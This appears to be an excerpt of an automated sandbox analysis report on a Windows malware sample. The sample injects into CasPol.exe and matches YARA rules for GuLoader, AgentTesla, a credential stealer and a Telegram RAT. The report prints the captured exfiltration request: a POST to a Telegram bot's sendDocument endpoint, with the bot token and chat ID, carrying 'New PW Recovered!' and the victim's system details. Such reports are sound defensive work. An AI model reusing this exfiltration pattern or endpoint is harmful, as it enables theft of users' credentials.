                                                2022-05-12 15:08:08 UTC213INData Raw: c8 d4 38 1c 4e ce 56 00 89 cf 8e 51 f3 08 ca 80 32 30 3c 3c f4 ee f1 90 f1 a1 f9 ef 97 0b 91 01 a9 f7 a1 c9 3f 8b 55 b8 9f 50 a1 3a e4 c7 60 0a a1 d2 04 a0 87 a4 83 ab 15 78 b4 c2 eb 74 13 f6 28 64 0b fa 27 83 b9 e0 24 63 2d 09 d0 75 71 95 a6 bd 8d e2 24 aa f8 90 b3 d3 f1 6d 41 28 3e 06 97 e1 c0 c8 b3 6d 1d 5d f1 65 85 ec 8f fb 9e 94 a2 22 8a 89 6e 34 a8 43 c6 d4 ad 34 41 ed f7 fd 07 89 b8 e1 0a e6 fc 52 4b 12 e3 8f 56 71 4f 9a 2f 6c 52 4b b2 a8 06 01 7e a0 fa d1 e5 8e b5 32 08 f9 d7 eb bc b7 98 c3 d0 11 03 c3 27 97 ad 42 d5 94 32 b9 1f 34 c2 a3 6e ac 35 dc 1d de 7f d5 cf ec 19 4d b4 5d 91 a8 2b 06 f3 82 4e 74 fd d1 ff 08 f3 dc 71 65 31 7f 06 c8 7e 83 9a 93 8a 62 5a 85 4e f8 63 57 35 7c 99 25 e8 ee 4a 70 e1 18 d5 49 e4 49 33 45 7a bb 76 d1 d4 2d e4 66 64
                                                Data Ascii: 8NVQ20<<?UP:`xt(d'$c-uq$mA(>m]e"n4C4ARKVqO/lRK~2'B24n5M]+Ntqe1~bZNcW5|%JpII3Ezv-fd
                                                2022-05-12 15:08:08 UTC214INData Raw: 56 dd 4f 4c 37 0f 11 38 2e 3d b0 74 f5 3b 22 bc 7d cf 42 3b e0 6c 49 ac 55 2b da 64 18 8c 31 2e c0 d2 f2 16 87 d7 38 04 93 f4 6c af 4f d1 6a f1 6c d6 33 d6 43 4a 5d 6d c9 86 6a 8a ae 7f f7 02 43 35 65 42 bb 64 4c b1 ce 74 15 37 4d e5 29 d9 92 80 d2 4d 91 78 40 23 96 45 e2 bb 93 61 3d c4 49 fb 52 75 81 bb fb 49 34 ca ba 7a c6 e3 99 d9 0b 38 05 fd ca ea 34 49 af de 63 b2 b1 56 a5 15 b4 38 6d 8e 05 9b 08 dc 0b 49 e9 19 97 8a b5 eb 79 63 cc c8 1e b1 42 5e 98 d7 45 cf 34 f7 76 a3 02 6d c8 07 ea a5 73 3c 9a 2e 54 f2 0c 50 b7 d1 a7 fc 90 d8 cb 55 87 b0 2b 39 32 c7 02 f2 7a 04 2a 83 86 b8 0e f2 6c 97 d1 5b 6e c9 f9 de 21 5a b9 cc f6 83 3a c1 86 de 85 bc 18 e4 de 7a 3d 48 5a 5b f8 97 fc 6b 9f f3 96 6e 4f 24 70 a6 dc bb 06 6c 77 bc 64 74 b4 a0 98 51 be 14 bd 80 6b
                                                Data Ascii: VOL78.=t;"}B;lIU+d1.8lOjl3CJ]mjC5eBdLt7M)Mx@#Ea=IRuI4z84IcV8mIycB^E4vms<.TPU+92z*l[n!Z:z=HZ[knO$plwdtQk
                                                2022-05-12 15:08:08 UTC216INData Raw: 49 0a c6 2d b7 13 a3 7a 99 5d ab 1a ae 37 c9 af 10 31 35 51 30 8c 7c 1a 46 c2 9c e2 b0 80 59 ce bc ee 70 1a ef 7e f9 c3 6b 4b 71 db 79 ce 0d c8 96 90 a0 b7 cb f1 3f 66 39 fa b1 1f a8 4b 53 f6 dd 47 f2 78 76 f1 c4 dc af 41 e5 45 a9 c7 54 3a f0 ee c3 77 2a 8e 2a a3 8c 8c 71 09 37 09 11 dd 6e d3 21 21 18 67 08 65 07 3f 5f ac 59 1c 31 9a 35 99 4e f7 82 7a c6 7d 1e db 3d 7c 1f 66 b5 71 58 ad 0a 47 a0 46 d9 73 70 e2 d2 74 e0 e8 c3 c7 f3 5c e5 8a 7c 7e ce 14 be f4 33 a3 8d e2 93 a1 d2 c0 c4 6b dd 5c 0d 0d 66 75 fb 28 c2 7a 12 93 5d d9 e4 dd d2 5e d5 1e b2 9b 45 8a 8c d3 67 38 b4 ca 03 aa be 53 a4 49 e2 41 34 57 4d 7a 5c a8 14 f6 69 46 ea ac 4a eb 7f aa bd ea 35 7a 8f 0b 87 16 7a ab c2 0c 7e 5b b2 13 28 62 00 87 3b dd 24 4c 6d 0f 74 38 7e 3d e8 74 bb 3b 78 bc 10
                                                Data Ascii: I-z]715Q0|FYp~kKqy?f9KSGxvAET:w**q7n!!ge?_Y15Nz}=|fqXGFspt\|~3k\fu(z]^Eg8SIA4WMz\iFJ5zz~[(b;$Lmt8~=t;x


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.11.2049753149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-05-12 15:08:21 UTC216OUTPOST /bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8da343ddb463be8
                                                Host: api.telegram.org
                                                Content-Length: 1020
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2022-05-12 15:08:21 UTC217INHTTP/1.1 100 Continue
                                                2022-05-12 15:08:21 UTC217OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 34 33 64 64 62 34 36 33 62 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 34 30 36 31 33 35 38 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 34 33 64 64 62 34 36 33 62 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 35 37 39 35 36 39 0a 4f 53 46 75 6c
                                                Data Ascii: -----------------------------8da343ddb463be8Content-Disposition: form-data; name="chat_id"5340613581-----------------------------8da343ddb463be8Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/579569OSFul
                                                2022-05-12 15:08:21 UTC218INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0
                                                Date: Thu, 12 May 2022 15:08:21 GMT
                                                Content-Type: application/json
                                                Content-Length: 609
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":true,"result":{"message_id":102,"from":{"id":5362707045,"is_bot":true,"first_name":"Moveolo","username":"Moveolo_bot"},"chat":{"id":5340613581,"first_name":"devil","last_name":"add","type":"private"},"date":1652368101,"document":{"file_name":"user-579569 2022-05-12 05-32-30.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAANmYn0i5cW4pkRSDlMoH29blDLhMSQAAiINAALcpuhTnNY8FPmbtlckBA","file_unique_id":"AgADIg0AAtym6FM","file_size":446},"caption":"New PW Recovered!\n\nUser Name: user/579569\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                                Click to jump to process

                                                Target ID:1
                                                Start time:17:07:27
                                                Start date:12/05/2022
                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
                                                Imagebase:0x400000
                                                File size:253128 bytes
                                                MD5 hash:90E91D605FB261FA827093074C0D7178
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.34639544413.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:3
                                                Start time:17:07:55
                                                Start date:12/05/2022
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
                                                Imagebase:0x510000
                                                File size:108664 bytes
                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Target ID:4
                                                Start time:17:07:55
                                                Start date:12/05/2022
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
                                                Imagebase:0xd10000
                                                File size:108664 bytes
                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.34495451157.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate

                                                Target ID:5
                                                Start time:17:07:55
                                                Start date:12/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff73b910000
                                                File size:875008 bytes
                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                No disassembly